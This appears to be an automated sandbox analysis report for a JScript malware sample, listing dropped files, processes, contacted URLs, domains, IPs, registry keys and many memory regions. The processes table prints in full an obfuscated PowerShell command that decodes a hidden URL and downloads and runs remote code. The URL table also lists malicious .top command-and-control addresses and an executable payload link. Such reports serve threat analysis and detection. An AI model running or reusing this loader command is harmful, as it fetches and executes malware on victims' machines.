Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
f699.js
|
Unicode text, UTF-16, little-endian text, with very long lines (1373)
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e3mn3us3.kz4.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iohiyljz.y21.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jizrjkio.ryj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yzftwxy2.15e.ps1
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\f699.js"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e
in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press
-useb $lira)
|
|
|
|
C:\Windows\System32\conhost.exe
|
conhost --headless powershell $ar='ur' ;new-alias press c$($ar)l;$eorvluhafsmg=(5405,5415,5421,5422,5403,5401,5422,5346,5416,5411,5412,5347,5349,5346,5412,5404,5412,5363,5415,5361,5409,5405,5410,5416,5415,5349);$dosvorv=('bronx','get-cmdlet');$zirbze=$eorvluhafsmg;foreach($rob9e
in $zirbze){$awi=$rob9e;$ufjgmblvpket=$ufjgmblvpket+[char]($awi-5300);$vizit=$ufjgmblvpket; $lira=$vizit};$gmtlyvepqows[2]=$lira;$wibyhv='rl';$five=1;.$([char](9992-9887)+'ex')(press
-useb $lira)
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://temp.sh
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
http://www.microsoft.c9t
|
unknown
|
||
|
http://isyzgez.top/1.php?s=mints1
|
192.153.57.159
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
http://temp.sh
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://temp.sh/bfseS/ruzxs.exe
|
51.91.79.17
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://mknjddllgakhaje.top
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
http://$m1o7nzq3c4ray05/$lytnxfpbkhsum2w.php?id=$env:computername&key=$mceotxshykj&s=mints1
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://isyzgez.top
|
unknown
|
||
|
http://mknjddllgakhaje.top/oie6bu9wr5htr.php?id=user-PC&key=43650517590&s=mints1
|
164.90.149.198
|
There are 11 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
temp.sh
|
51.91.79.17
|
||
|
isyzgez.top
|
192.153.57.159
|
||
|
mknjddllgakhaje.top
|
164.90.149.198
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
192.153.57.159
|
isyzgez.top
|
United States
|
||
|
51.91.79.17
|
temp.sh
|
France
|
||
|
164.90.149.198
|
mknjddllgakhaje.top
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
237DC9F6000
|
heap
|
page read and write
|
||
|
237DA73F000
|
heap
|
page read and write
|
||
|
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
|
1B32C320000
|
heap
|
page read and write
|
||
|
237DCB3D000
|
heap
|
page read and write
|
||
|
7FFD9BAE0000
|
trusted library allocation
|
page read and write
|
||
|
237DCAE5000
|
heap
|
page read and write
|
||
|
B49C5FE000
|
stack
|
page read and write
|
||
|
237DA721000
|
heap
|
page read and write
|
||
|
237DC6C5000
|
heap
|
page read and write
|
||
|
7FFD9B970000
|
trusted library allocation
|
page execute and read and write
|
||
|
237DA74E000
|
heap
|
page read and write
|
||
|
237DA759000
|
heap
|
page read and write
|
||
|
7DF4C4300000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B3464F0000
|
heap
|
page read and write
|
||
|
237DCADD000
|
heap
|
page read and write
|
||
|
1B34635D000
|
heap
|
page read and write
|
||
|
50145FE000
|
stack
|
page read and write
|
||
|
237DA759000
|
heap
|
page read and write
|
||
|
237DA73D000
|
heap
|
page read and write
|
||
|
237DCB54000
|
heap
|
page read and write
|
||
|
1B330206000
|
trusted library allocation
|
page read and write
|
||
|
1B32DE60000
|
heap
|
page read and write
|
||
|
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
|
237DCAB6000
|
heap
|
page read and write
|
||
|
7FFD9BBC4000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
|
237DA75D000
|
heap
|
page read and write
|
||
|
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B79B000
|
trusted library allocation
|
page read and write
|
||
|
5015C4D000
|
stack
|
page read and write
|
||
|
7FFD9BA20000
|
trusted library allocation
|
page read and write
|
||
|
1B34657A000
|
heap
|
page read and write
|
||
|
1B32DE00000
|
heap
|
page execute and read and write
|
||
|
7FFD9B931000
|
trusted library allocation
|
page read and write
|
||
|
237DA9AB000
|
heap
|
page read and write
|
||
|
237DCA1E000
|
heap
|
page read and write
|
||
|
5014FBC000
|
stack
|
page read and write
|
||
|
237DCB09000
|
heap
|
page read and write
|
||
|
1B32C35D000
|
heap
|
page read and write
|
||
|
1B3303B5000
|
trusted library allocation
|
page read and write
|
||
|
1B32C2C0000
|
heap
|
page readonly
|
||
|
1B34668A000
|
heap
|
page read and write
|
||
|
237DCA13000
|
heap
|
page read and write
|
||
|
5014CB9000
|
stack
|
page read and write
|
||
|
237DA72B000
|
heap
|
page read and write
|
||
|
237DA750000
|
heap
|
page read and write
|
||
|
237DCCE9000
|
heap
|
page read and write
|
||
|
1B32C359000
|
heap
|
page read and write
|
||
|
237DC9E3000
|
heap
|
page read and write
|
||
|
5015A0F000
|
stack
|
page read and write
|
||
|
237DC805000
|
heap
|
page read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
237DC9F6000
|
heap
|
page read and write
|
||
|
B49CAFF000
|
stack
|
page read and write
|
||
|
237DCADD000
|
heap
|
page read and write
|
||
|
237DCAF1000
|
heap
|
page read and write
|
||
|
1B32DDC5000
|
heap
|
page read and write
|
||
|
237DA8A0000
|
heap
|
page read and write
|
||
|
237DC9E7000
|
heap
|
page read and write
|
||
|
237DC9EB000
|
heap
|
page read and write
|
||
|
237DC9F3000
|
heap
|
page read and write
|
||
|
237DA751000
|
heap
|
page read and write
|
||
|
237DA742000
|
heap
|
page read and write
|
||
|
237DA9AC000
|
heap
|
page read and write
|
||
|
1B330264000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
|
1B32C30F000
|
heap
|
page read and write
|
||
|
237DCB37000
|
heap
|
page read and write
|
||
|
1B3466FA000
|
heap
|
page read and write
|
||
|
7FFD9B969000
|
trusted library allocation
|
page read and write
|
||
|
1B32C250000
|
heap
|
page read and write
|
||
|
7FFD9BB60000
|
trusted library allocation
|
page execute and read and write
|
||
|
237DCA13000
|
heap
|
page read and write
|
||
|
237DA742000
|
heap
|
page read and write
|
||
|
237DCAF2000
|
heap
|
page read and write
|
||
|
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
|
237DCB1D000
|
heap
|
page read and write
|
||
|
237DA750000
|
heap
|
page read and write
|
||
|
237DCB37000
|
heap
|
page read and write
|
||
|
1B346500000
|
heap
|
page read and write
|
||
|
5015E4B000
|
stack
|
page read and write
|
||
|
237DCAEA000
|
heap
|
page read and write
|
||
|
50149FF000
|
stack
|
page read and write
|
||
|
7FFD9BB00000
|
trusted library allocation
|
page read and write
|
||
|
237DC9FC000
|
heap
|
page read and write
|
||
|
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
|
1B32C2D0000
|
heap
|
page read and write
|
||
|
237DCB09000
|
heap
|
page read and write
|
||
|
1B3301A3000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9C0000
|
trusted library allocation
|
page read and write
|
||
|
1B32F719000
|
trusted library allocation
|
page read and write
|
||
|
5014B78000
|
stack
|
page read and write
|
||
|
5015BCC000
|
stack
|
page read and write
|
||
|
1B32C516000
|
heap
|
page execute and read and write
|
||
|
1B32C357000
|
heap
|
page read and write
|
||
|
5014BBE000
|
stack
|
page read and write
|
||
|
1B32DE50000
|
trusted library allocation
|
page read and write
|
||
|
237DCA0C000
|
heap
|
page read and write
|
||
|
1B32C3D0000
|
trusted library allocation
|
page read and write
|
||
|
1B32C2F7000
|
heap
|
page read and write
|
||
|
1B33E073000
|
trusted library allocation
|
page read and write
|
||
|
237DA9A5000
|
heap
|
page read and write
|
||
|
5014D3E000
|
stack
|
page read and write
|
||
|
237DCB37000
|
heap
|
page read and write
|
||
|
1B32C31E000
|
heap
|
page read and write
|
||
|
237DCAE8000
|
heap
|
page read and write
|
||
|
1B32C314000
|
heap
|
page read and write
|
||
|
237DCADE000
|
heap
|
page read and write
|
||
|
50148FE000
|
stack
|
page read and write
|
||
|
237DCA91000
|
heap
|
page read and write
|
||
|
237DA6FF000
|
heap
|
page read and write
|
||
|
237DA761000
|
heap
|
page read and write
|
||
|
237DA9AE000
|
heap
|
page read and write
|
||
|
237DCA5E000
|
heap
|
page read and write
|
||
|
237DA74A000
|
heap
|
page read and write
|
||
|
237DA72D000
|
heap
|
page read and write
|
||
|
237DCADE000
|
heap
|
page read and write
|
||
|
237DCA2E000
|
heap
|
page read and write
|
||
|
B49CCFE000
|
stack
|
page read and write
|
||
|
5015D4D000
|
stack
|
page read and write
|
||
|
1B330097000
|
trusted library allocation
|
page read and write
|
||
|
237DCB0E000
|
heap
|
page read and write
|
||
|
237DA75A000
|
heap
|
page read and write
|
||
|
237DCAFF000
|
heap
|
page read and write
|
||
|
1B34662A000
|
heap
|
page read and write
|
||
|
237DCAE0000
|
heap
|
page read and write
|
||
|
237DA9AC000
|
heap
|
page read and write
|
||
|
1B32DEEF000
|
trusted library allocation
|
page read and write
|
||
|
237DA721000
|
heap
|
page read and write
|
||
|
1B32FBCF000
|
trusted library allocation
|
page read and write
|
||
|
237DCB1D000
|
heap
|
page read and write
|
||
|
5015A8D000
|
stack
|
page read and write
|
||
|
237DCA76000
|
heap
|
page read and write
|
||
|
1B33E15D000
|
trusted library allocation
|
page read and write
|
||
|
237DCB09000
|
heap
|
page read and write
|
||
|
237DA75E000
|
heap
|
page read and write
|
||
|
1B32C555000
|
heap
|
page read and write
|
||
|
1B32FB37000
|
trusted library allocation
|
page read and write
|
||
|
237DCA3A000
|
heap
|
page read and write
|
||
|
237DCB11000
|
heap
|
page read and write
|
||
|
1B33E07B000
|
trusted library allocation
|
page read and write
|
||
|
237DCADD000
|
heap
|
page read and write
|
||
|
1B32F9D2000
|
trusted library allocation
|
page read and write
|
||
|
237DA75F000
|
heap
|
page read and write
|
||
|
1B3466C0000
|
heap
|
page read and write
|
||
|
237DC9F6000
|
heap
|
page read and write
|
||
|
7FFD9BCA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BB70000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B83C000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B32C110000
|
heap
|
page read and write
|
||
|
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B780000
|
trusted library allocation
|
page read and write
|
||
|
1B346900000
|
heap
|
page read and write
|
||
|
237DCB2E000
|
heap
|
page read and write
|
||
|
7FFD9BC00000
|
trusted library allocation
|
page execute and read and write
|
||
|
5015DCB000
|
stack
|
page read and write
|
||
|
237DCA42000
|
heap
|
page read and write
|
||
|
237DCAF6000
|
heap
|
page read and write
|
||
|
5014DBE000
|
stack
|
page read and write
|
||
|
237DCAF9000
|
heap
|
page read and write
|
||
|
237DA721000
|
heap
|
page read and write
|
||
|
237DCA91000
|
heap
|
page read and write
|
||
|
237DA75E000
|
heap
|
page read and write
|
||
|
237DCADA000
|
heap
|
page read and write
|
||
|
5014E3E000
|
stack
|
page read and write
|
||
|
7FFD9B7DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B32F9D5000
|
trusted library allocation
|
page read and write
|
||
|
1B32DE71000
|
trusted library allocation
|
page read and write
|
||
|
237DCB16000
|
heap
|
page read and write
|
||
|
1B33E04C000
|
trusted library allocation
|
page read and write
|
||
|
237DCAEE000
|
heap
|
page read and write
|
||
|
237DCAE2000
|
heap
|
page read and write
|
||
|
5014EB8000
|
stack
|
page read and write
|
||
|
1B3466C9000
|
heap
|
page read and write
|
||
|
237DA749000
|
heap
|
page read and write
|
||
|
1B3466D6000
|
heap
|
page read and write
|
||
|
1B32C530000
|
heap
|
page execute and read and write
|
||
|
1B32DD0A000
|
heap
|
page read and write
|
||
|
7FFD9BA80000
|
trusted library allocation
|
page read and write
|
||
|
237DCA6A000
|
heap
|
page read and write
|
||
|
237DCB54000
|
heap
|
page read and write
|
||
|
B49C9FF000
|
stack
|
page read and write
|
||
|
1B32C330000
|
heap
|
page read and write
|
||
|
B49C6FE000
|
stack
|
page read and write
|
||
|
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
|
237DCADE000
|
heap
|
page read and write
|
||
|
7FFD9B866000
|
trusted library allocation
|
page execute and read and write
|
||
|
237DA9AA000
|
heap
|
page read and write
|
||
|
1B33DE71000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
237DCA51000
|
heap
|
page read and write
|
||
|
1B32FBAF000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B7AB000
|
trusted library allocation
|
page execute and read and write
|
||
|
237DCB39000
|
heap
|
page read and write
|
||
|
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
|
1B32DD40000
|
heap
|
page read and write
|
||
|
1B34637D000
|
heap
|
page read and write
|
||
|
237DCB00000
|
heap
|
page read and write
|
||
|
1B33E17B000
|
trusted library allocation
|
page read and write
|
||
|
1B32C290000
|
trusted library allocation
|
page read and write
|
||
|
237DCAF7000
|
heap
|
page read and write
|
||
|
1B32C2E2000
|
heap
|
page read and write
|
||
|
1B33DEE2000
|
trusted library allocation
|
page read and write
|
||
|
237DCA91000
|
heap
|
page read and write
|
||
|
1B32C400000
|
trusted library allocation
|
page read and write
|
||
|
237DCB2E000
|
heap
|
page read and write
|
||
|
237DA759000
|
heap
|
page read and write
|
||
|
237DCA3D000
|
heap
|
page read and write
|
||
|
237DA9AE000
|
heap
|
page read and write
|
||
|
7FFD9BB80000
|
trusted library allocation
|
page execute and read and write
|
||
|
237DA726000
|
heap
|
page read and write
|
||
|
1B32C510000
|
heap
|
page execute and read and write
|
||
|
7FFD9B965000
|
trusted library allocation
|
page read and write
|
||
|
237DCAF2000
|
heap
|
page read and write
|
||
|
237DCA4E000
|
heap
|
page read and write
|
||
|
1B32C455000
|
heap
|
page read and write
|
||
|
237DC581000
|
heap
|
page read and write
|
||
|
237DCB38000
|
heap
|
page read and write
|
||
|
237DCB3D000
|
heap
|
page read and write
|
||
|
237DCB18000
|
heap
|
page read and write
|
||
|
237DA6A0000
|
heap
|
page read and write
|
||
|
237DCB08000
|
heap
|
page read and write
|
||
|
7FFD9BCD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
237DCB29000
|
heap
|
page read and write
|
||
|
237DA721000
|
heap
|
page read and write
|
||
|
1B32C312000
|
heap
|
page read and write
|
||
|
237DCB3D000
|
heap
|
page read and write
|
||
|
1B32C210000
|
heap
|
page read and write
|
||
|
237DCB15000
|
heap
|
page read and write
|
||
|
1B34652C000
|
heap
|
page read and write
|
||
|
5014573000
|
stack
|
page read and write
|
||
|
1B32DD91000
|
heap
|
page read and write
|
||
|
237DC801000
|
heap
|
page read and write
|
||
|
237DA704000
|
heap
|
page read and write
|
||
|
237DA70E000
|
heap
|
page read and write
|
||
|
237DCA26000
|
heap
|
page read and write
|
||
|
237DCA13000
|
heap
|
page read and write
|
||
|
1B32C450000
|
heap
|
page read and write
|
||
|
7FFD9BCC0000
|
trusted library allocation
|
page read and write
|
||
|
237DCA76000
|
heap
|
page read and write
|
||
|
7FFD9B962000
|
trusted library allocation
|
page read and write
|
||
|
237DCA3D000
|
heap
|
page read and write
|
||
|
1B32FBCB000
|
trusted library allocation
|
page read and write
|
||
|
1B33E16B000
|
trusted library allocation
|
page read and write
|
||
|
237DCB02000
|
heap
|
page read and write
|
||
|
1B32C3C8000
|
heap
|
page read and write
|
||
|
237DCADD000
|
heap
|
page read and write
|
||
|
237DCADD000
|
heap
|
page read and write
|
||
|
237DCAF4000
|
heap
|
page read and write
|
||
|
1B32F9E7000
|
trusted library allocation
|
page read and write
|
||
|
237DA6D8000
|
heap
|
page read and write
|
||
|
1B3466EE000
|
heap
|
page read and write
|
||
|
1B32DD3E000
|
heap
|
page read and write
|
||
|
501598E000
|
stack
|
page read and write
|
||
|
237DA900000
|
heap
|
page read and write
|
||
|
237DCB1D000
|
heap
|
page read and write
|
||
|
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
|
237DCA82000
|
heap
|
page read and write
|
||
|
7FFD9BC63000
|
trusted library allocation
|
page read and write
|
||
|
237DA6F1000
|
heap
|
page read and write
|
||
|
5015B4F000
|
stack
|
page read and write
|
||
|
1B346682000
|
heap
|
page read and write
|
||
|
237DCA04000
|
heap
|
page read and write
|
||
|
237DCAF8000
|
heap
|
page read and write
|
||
|
237DCB13000
|
heap
|
page read and write
|
||
|
237DCAF2000
|
heap
|
page read and write
|
||
|
1B32FD1E000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
|
237DCB54000
|
heap
|
page read and write
|
||
|
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB30000
|
trusted library allocation
|
page execute and read and write
|
||
|
237DCAE1000
|
heap
|
page read and write
|
||
|
1B33E071000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA70000
|
trusted library allocation
|
page read and write
|
||
|
237DCB00000
|
heap
|
page read and write
|
||
|
237DC80A000
|
heap
|
page read and write
|
||
|
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
|
237DA744000
|
heap
|
page read and write
|
||
|
237DA6EC000
|
heap
|
page read and write
|
||
|
7FFD9BAC0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
|
237DA731000
|
heap
|
page read and write
|
||
|
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
|
237DCAA6000
|
heap
|
page read and write
|
||
|
237DA9AE000
|
heap
|
page read and write
|
||
|
237DCAFA000
|
heap
|
page read and write
|
||
|
237DA72F000
|
heap
|
page read and write
|
||
|
1B33E08B000
|
trusted library allocation
|
page read and write
|
||
|
237DA6FF000
|
heap
|
page read and write
|
||
|
237DCA3D000
|
heap
|
page read and write
|
||
|
1B32C2B0000
|
trusted library allocation
|
page read and write
|
||
|
5014AFA000
|
stack
|
page read and write
|
||
|
237DA9A0000
|
heap
|
page read and write
|
||
|
7DF4C4320000
|
trusted library allocation
|
page execute and read and write
|
||
|
237DCA3D000
|
heap
|
page read and write
|
||
|
7FFD9B783000
|
trusted library allocation
|
page execute and read and write
|
||
|
237DA756000
|
heap
|
page read and write
|
||
|
237DCA96000
|
heap
|
page read and write
|
||
|
1B345E7B000
|
heap
|
page read and write
|
||
|
237DCAE8000
|
heap
|
page read and write
|
||
|
237DCB08000
|
heap
|
page read and write
|
||
|
237DCA46000
|
heap
|
page read and write
|
||
|
B49C8FF000
|
stack
|
page read and write
|
||
|
7FFD9B790000
|
trusted library allocation
|
page read and write
|
||
|
237DCB2E000
|
heap
|
page read and write
|
||
|
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
237DCAF7000
|
heap
|
page read and write
|
||
|
237DCADE000
|
heap
|
page read and write
|
||
|
1B32F9D0000
|
trusted library allocation
|
page read and write
|
||
|
237DC9E1000
|
heap
|
page read and write
|
||
|
1B32F38B000
|
trusted library allocation
|
page read and write
|
||
|
5014C37000
|
stack
|
page read and write
|
||
|
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
|
237DA742000
|
heap
|
page read and write
|
||
|
237DA6FE000
|
heap
|
page read and write
|
||
|
237DCA16000
|
heap
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page execute and read and write
|
||
|
1B33027D000
|
trusted library allocation
|
page read and write
|
||
|
237DCA51000
|
heap
|
page read and write
|
||
|
237DC9F8000
|
heap
|
page read and write
|
||
|
501487E000
|
stack
|
page read and write
|
||
|
237DCA3D000
|
heap
|
page read and write
|
||
|
237DCAC6000
|
heap
|
page read and write
|
||
|
237DA9AE000
|
heap
|
page read and write
|
||
|
1B32E093000
|
trusted library allocation
|
page read and write
|
||
|
B49CBFE000
|
stack
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAD0000
|
trusted library allocation
|
page read and write
|
||
|
237DC9F6000
|
heap
|
page read and write
|
||
|
1B32C1F0000
|
heap
|
page read and write
|
||
|
237DA75B000
|
heap
|
page read and write
|
||
|
237DCA13000
|
heap
|
page read and write
|
||
|
237DCAFF000
|
heap
|
page read and write
|
||
|
7FFD9BBDC000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BB50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
|
1B32C45C000
|
heap
|
page read and write
|
||
|
1B346375000
|
heap
|
page read and write
|
||
|
237DA9AD000
|
heap
|
page read and write
|
||
|
5014F3D000
|
stack
|
page read and write
|
||
|
237DCB1D000
|
heap
|
page read and write
|
||
|
237DA6D0000
|
heap
|
page read and write
|
||
|
237DCB21000
|
heap
|
page read and write
|
||
|
237DC9F6000
|
heap
|
page read and write
|
||
|
1B32C550000
|
heap
|
page read and write
|
||
|
237DCB09000
|
heap
|
page read and write
|
||
|
237DA761000
|
heap
|
page read and write
|
||
|
237DC9EF000
|
heap
|
page read and write
|
||
|
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBC9000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
|
237DCAE1000
|
heap
|
page read and write
|
||
|
237DCB1D000
|
heap
|
page read and write
|
||
|
237DA750000
|
heap
|
page read and write
|
||
|
237DA6F8000
|
heap
|
page read and write
|
||
|
237DA705000
|
heap
|
page read and write
|
||
|
237DCB3E000
|
heap
|
page read and write
|
||
|
237DA73C000
|
heap
|
page read and write
|
||
|
1B3465C9000
|
heap
|
page read and write
|
||
|
5015CCC000
|
stack
|
page read and write
|
||
|
1B34660D000
|
heap
|
page read and write
|
||
|
237DCB0F000
|
heap
|
page read and write
|
||
|
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
|
1B32C440000
|
trusted library allocation
|
page read and write
|
||
|
237DCA91000
|
heap
|
page read and write
|
||
|
1B3465BF000
|
heap
|
page read and write
|
||
|
1B32DD00000
|
heap
|
page read and write
|
||
|
1B33017D000
|
trusted library allocation
|
page read and write
|
||
|
237DCB54000
|
heap
|
page read and write
|
||
|
7FFD9B78D000
|
trusted library allocation
|
page execute and read and write
|
||
|
5014D37000
|
stack
|
page read and write
|
||
|
1B32E98B000
|
trusted library allocation
|
page read and write
|
||
|
237DCADE000
|
heap
|
page read and write
|
||
|
237DCADE000
|
heap
|
page read and write
|
||
|
237DA6F1000
|
heap
|
page read and write
|
||
|
237DA742000
|
heap
|
page read and write
|
||
|
B49C4F9000
|
stack
|
page read and write
|
||
|
237DCB54000
|
heap
|
page read and write
|
||
|
237DCB28000
|
heap
|
page read and write
|
||
|
237DCB0A000
|
heap
|
page read and write
|
||
|
7FFD9BB90000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BAF0000
|
trusted library allocation
|
page read and write
|
||
|
237DA70F000
|
heap
|
page read and write
|
||
|
237DC58B000
|
heap
|
page read and write
|
||
|
237DCB05000
|
heap
|
page read and write
|
||
|
7FFD9B782000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B9B0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B93A000
|
trusted library allocation
|
page read and write
|
||
|
237DCB1D000
|
heap
|
page read and write
|
||
|
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
|
1B32F9CE000
|
trusted library allocation
|
page read and write
|
||
|
237DCB39000
|
heap
|
page read and write
|
||
|
237DCA91000
|
heap
|
page read and write
|
||
|
7FFD9B7A0000
|
trusted library allocation
|
page read and write
|
||
|
237DCA56000
|
heap
|
page read and write
|
||
|
7FFD9BB20000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B830000
|
trusted library allocation
|
page read and write
|
||
|
1B346603000
|
heap
|
page read and write
|
||
|
237DCB23000
|
heap
|
page read and write
|
||
|
237DA727000
|
heap
|
page read and write
|
||
|
1B346350000
|
heap
|
page read and write
|
||
|
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
|
237DCB1D000
|
heap
|
page read and write
|
||
|
237DA690000
|
heap
|
page read and write
|
||
|
1B346686000
|
heap
|
page read and write
|
||
|
237DCAE8000
|
heap
|
page read and write
|
||
|
237DC9F6000
|
heap
|
page read and write
|
||
|
237DCB19000
|
heap
|
page read and write
|
||
|
237DA721000
|
heap
|
page read and write
|
||
|
237DCADE000
|
heap
|
page read and write
|
||
|
237DC9E0000
|
heap
|
page read and write
|
||
|
501497A000
|
stack
|
page read and write
|
||
|
237DCB01000
|
heap
|
page read and write
|
||
|
5014A7D000
|
stack
|
page read and write
|
||
|
237DCB0F000
|
heap
|
page read and write
|
||
|
7FFD9B8A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
237DA742000
|
heap
|
page read and write
|
||
|
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBD8000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BAA0000
|
trusted library allocation
|
page read and write
|
||
|
237DA6F9000
|
heap
|
page read and write
|
||
|
1B32DDD7000
|
heap
|
page read and write
|
||
|
7FFD9BBA3000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9BBC0000
|
